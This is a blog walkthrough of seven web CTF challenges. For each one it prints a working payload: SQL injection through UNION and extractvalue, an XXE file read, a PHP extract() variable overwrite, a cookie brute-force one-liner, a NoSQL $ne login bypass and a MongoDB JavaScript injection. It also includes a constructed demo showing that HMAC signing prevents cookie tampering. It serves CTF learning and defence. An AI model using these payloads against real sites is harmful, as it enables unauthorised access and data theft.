Thursday, June 29, 2017

Easy Komodo CTF Walkthrough/Solutions. Wasted 2:45h of my life.

Easy challenges by Komodo Israel, completed in 2 hours 45 minutes (have proof :).

For the record, the original leaderboard looked like this:


Challenge 1 - Union based SQL Injection:


GET Request:
http://ctf.komodosec.com/challenge-1.php?city=lame-challenge' union select 1,flag,3,4,5 from flags%23

Challenge 2 - SQL Injection via ORDER/GROUP BY:


GET Request:
http://ctf.komodosec.com/challenge-2.php?city=lame-challenge2&ob=extractvalue(0x0a,concat(0x0a,(select flag from flags)))-BR

Challenge 3 - XXE:


Enable hidden form:


POST Request:
data=<?xml version="1.0" ?>
<!DOCTYPE nopernik [
<!ENTITY lame-xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/challenge-3.php">]>
<books><book>%26lame-xxe;</book></books>


Challenge 4 - Variable assignment via extract():


Get hint and PHP source code:
root@nopernik:~# echo ICcnLmpvaW4oW2NocihvcmQoaSleODIpIGZvciBpIGluICdcJyE3ciQ7NyUhPVwnIDE3ciIzIDM/J10p|base64 -d
 ''.join([chr(ord(i)^82) for i in '\'!7r$;7%!=\' 17r"3 3?'])

root@nopernik:~# python
>>> ''.join([chr(ord(i)^82) for i in '\'!7r$;7%!=\' 17r"3 3?'])
'use viewsource param'
>>>
GET Request:
http://ctf.komodosec.com/challenge-4.php?viewsource=lame-challenge

From the source code we can see that the script's main function is to send an email. We have to find a way to inject our own email address into the $sendTo variable.
For that we will use the extract() function, which assigns each value of the given array to a variable named after its key. $_GET is the array that gets passed to extract(), and we control its contents via the GET request.
We can also see that the script prints out the value of $error. Let's verify that:
GET http://ctf.komodosec.com/challenge-4.php?extract=p&error=lame-challenge
We will see lame-challenge in the server's response.

Next, we want to change the $sendTo variable. Luckily, it is assigned before the extract() call, so the value we supply overwrites it:

http://ctf.komodosec.com/challenge-4.php?extract=p&sendTo=nopernik@gmail.com
Check your spam folder.

Challenge 5 - Weak encryption:


Once we log in with any name other than "admin", we get a cookie:
my_session=StxtqfSPt%2BE1WNG9wdoUCauaqGP%2FKu0wGciMJkwnxoA%3D
Then, by decoding that cookie and changing its first character, we see the server's output change.

Using a "bdmin" account and changing the first character, we can easily brute-force the cookie for the "admin" account with only 256 requests.

Python one-liner that generates all possible variations:
a='your_cookie'.decode('base64'); print ''.join([(chr(i)+a[1:]).encode('base64') for i in range(256)])

Paste the 256 resulting lines into Intruder and get your flag.
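
Why 256 requests are enough here, and what stops it, as an added example that is not from the CTF's code: the server's real cookie scheme is not shown, so a toy XOR keystream stands in for it, and every key and function name below is constructed for illustration. With an HMAC-SHA256 tag on the cookie, only the unmodified value verifies.

```python
import base64, binascii, hashlib, hmac, os

# Constructed demo secrets; nothing here comes from the CTF server.
ENC_KEY, MAC_KEY = os.urandom(32), os.urandom(32)
TAG_LEN = 32  # HMAC-SHA256 output size

def _toy_xor(data: bytes) -> bytes:
    # Stand-in for the unknown scheme: any cipher where ciphertext byte i
    # maps straight onto plaintext byte i behaves like this.
    stream = hashlib.sha256(ENC_KEY).digest()
    return bytes(b ^ stream[i % len(stream)] for i, b in enumerate(data))

def weak_issue(user: str) -> str:
    """Encrypt-only cookie: no integrity check at all."""
    return base64.b64encode(_toy_xor(user.encode())).decode()

def weak_read(cookie: str):
    """Accepts whatever decrypts, so a changed byte is a changed user name."""
    return _toy_xor(base64.b64decode(cookie)).decode("latin-1")

def signed_issue(user: str) -> str:
    """User name followed by an HMAC-SHA256 tag over it."""
    body = user.encode()
    tag = hmac.new(MAC_KEY, body, hashlib.sha256).digest()
    return base64.b64encode(body + tag).decode()

def signed_read(cookie: str):
    """Return the user name, or None when the tag does not verify."""
    try:
        raw = base64.b64decode(cookie, validate=True)
    except binascii.Error:
        return None
    body, tag = raw[:-TAG_LEN], raw[-TAG_LEN:]
    expected = hmac.new(MAC_KEY, body, hashlib.sha256).digest()
    if len(raw) <= TAG_LEN or not hmac.compare_digest(tag, expected):
        return None
    return body.decode("utf-8", "replace")

def accepted_names(cookie: str, reader) -> set:
    """Names the reader accepts across all 256 first-byte variants of cookie."""
    raw = base64.b64decode(cookie)
    variants = (base64.b64encode(bytes([i]) + raw[1:]).decode() for i in range(256))
    return {name for name in map(reader, variants) if name is not None}

if __name__ == "__main__":
    print(len(accepted_names(weak_issue("bdmin"), weak_read)))  # weak reader
    print(accepted_names(signed_issue("bdmin"), signed_read))   # signed reader
```

In production, a framework's signed session store or an AEAD mode such as AES-GCM gives the same integrity guarantee without hand-rolled code.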



Challenge 6 - NoSQL Injection:


Everyone gets stuck on "overflow the stack with 1885979".
But if you google it, you get https://stackoverflow.com/questions/1885979/php-get-variable-array-injection
Arrays?? NoSQL Injection.

POST Request:
name[$ne]=&password[$ne]=&submit=Submit+Form

Challenge 7 - MongoDB Injection:


MongoDB & JavaScript

POST Request:
question='});return db.getCollectionNames();}//&validate=Ask